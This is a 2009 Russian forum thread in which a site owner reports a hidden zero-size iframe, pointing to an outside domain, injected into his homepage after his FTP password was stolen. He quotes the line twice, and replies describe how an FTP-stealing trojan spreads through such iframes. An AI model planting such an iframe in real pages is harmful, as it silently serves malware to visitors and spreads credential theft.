Перейти к содержимому

Реферальная программа Мегаплана

Партнерская программа Kredov

Вирусы, трояны, своровали пароль

#1 Bender

Bender
  • Пользователь
  • 712 сообщений
  • Репутация: 0
0

Отправлено 01 Апрель 2009 - 19:00

Знаю что теоритически пароль могут похитить с компа если он хранится в каком либо файле, но никогда не беспокоился по этому поводу - своего крупного сайта, который мечтают поломать все хакеры у меня нет, да и касперский всегда запущен. Но недавно похоже кто-то кто-то проломал мой сайт, но ничего серьезного не сделал, а просто появилась строка внизу главной страницы.
<iframe src="http://tosto-vik.ru/index.php" width="0" height="0" style="display:none;"></iframe>
Я спросил у хостера, он сказал что кто-то знает мой фтп пароль, и сказал чтоб я его поменял. Я поменял пароль, проверил комп на вирусы, ничего не нашел. Но в этот же день вечером каспер сам нашел трояна в диске С :) . Но мне почему - то кажется что мой пароль украли со стороны хостера, а не с моего компа. Вобщем у меня вопрос - насколко все это серьезно, как работают эти трояны. Разрешаете ли вы своему тоталу хранить пароли? Храните ли вы пароль в жезле Оперы (у кого она есть) ?

 

 

  • 0

#2 FordogeN

FordogeN
  • Пользователь
  • 1 414 сообщений
  • Репутация: 0

Отправлено 01 Апрель 2009 - 19:34

пароли сохраняю в мозиле, оперу юзают гости и пароли тоже сохраняют.
фтп юзаю через эксплорер (через папку, не через ИЕ)
  • 0

Как настроить выдержку и диафрагму зеркального фотоаппарата



#3 Galeodor

Galeodor
  • Пользователь
  • 1 172 сообщений
  • Репутация: 2

Отправлено 01 Апрель 2009 - 19:53

пароли все храню в отдельной программе, где поставлен 128битный код на доступ ко всей базе паролей.
  • 0

#4 ZiTosS

ZiTosS
  • Пользователь
  • 5 148 сообщений
  • Репутация: 8

Отправлено 01 Апрель 2009 - 20:25

Bender, была такая же проблема, пароли не хранил ни в total ни в браузерах.
Вообще доступ получить могут как с вашей стороны, так и со стороны хостера, узнав логин и пароль к FTP.

Такой тип троянов свойственен со стороны пользователей, слабо защищенных в интернете.
Такой троян работает лавинно, отсылает ли троян данные куда-то не известно. Лавинность заключается в том, что пользователи заходящие на сайт, автоматом получают себе троян на комп, с помощью этого фрейма вставленного в index.* Затем он себе лежит преспокойно в пассивном режиме на компе пользователя до тех пор, пока не будет идти обращение к FTP-протоколу., тут то он и начинает свои деяния. Он получает данные FTP введённые пользователем, подключается и так же вставляет в index.*, рекурсивно пробегаясь по всей структуре сайта, фрейм с трояном.
Таким образом распрространение этого трояна лавинно нарастает. Величина роста зависит от незащещённости пользовательских компьютеров.

Я никогда не сохраняю свои пароли в total commander или в браузерных аддонах, так как это вдвойне не безопасно, особенно при доступе к компьютеру из сети.
  • 0

#5 Bender

Bender
    Topic Starter
  • Пользователь
  • 712 сообщений
  • Репутация: 0

Отправлено 02 Апрель 2009 - 10:11

Так что эта строка и была вирусом?

<iframe src="http://tosto-vik.ru/index.php" width="0" height="0" style="display:none;"></iframe>

Почему тогда касперский ничего не говорил?
  • 0

#6 Galeodor

Galeodor
  • Пользователь
  • 1 172 сообщений
  • Репутация: 2

Отправлено 02 Апрель 2009 - 12:05

Так что эта строка и была вирусом?

Почему тогда касперский ничего не говорил?

1)это не вирус, это айфрейм.
2)дураки есть везде, даже в Касперском.
  • 0

#7 FordogeN

FordogeN
  • Пользователь
  • 1 414 сообщений
  • Репутация: 0

Отправлено 02 Апрель 2009 - 14:35

Может просто новый какой то троян. У меня когда был кашпер - он вижжал, но не на все.
Именно от таких ифреймовых лучше всего защищает аваст. Проверено не одним мной!
  • 0

Как настроить выдержку и диафрагму зеркального фотоаппарата



#8 Galeodor

Galeodor
  • Пользователь
  • 1 172 сообщений
  • Репутация: 2

Отправлено 02 Апрель 2009 - 20:21

на совсем древние не визжит.
  • 0

robot

robot
  • Пользователь PRO
  • 2 652 сообщений
  • Репутация: 85


Оформление форума – IPBSkins.ru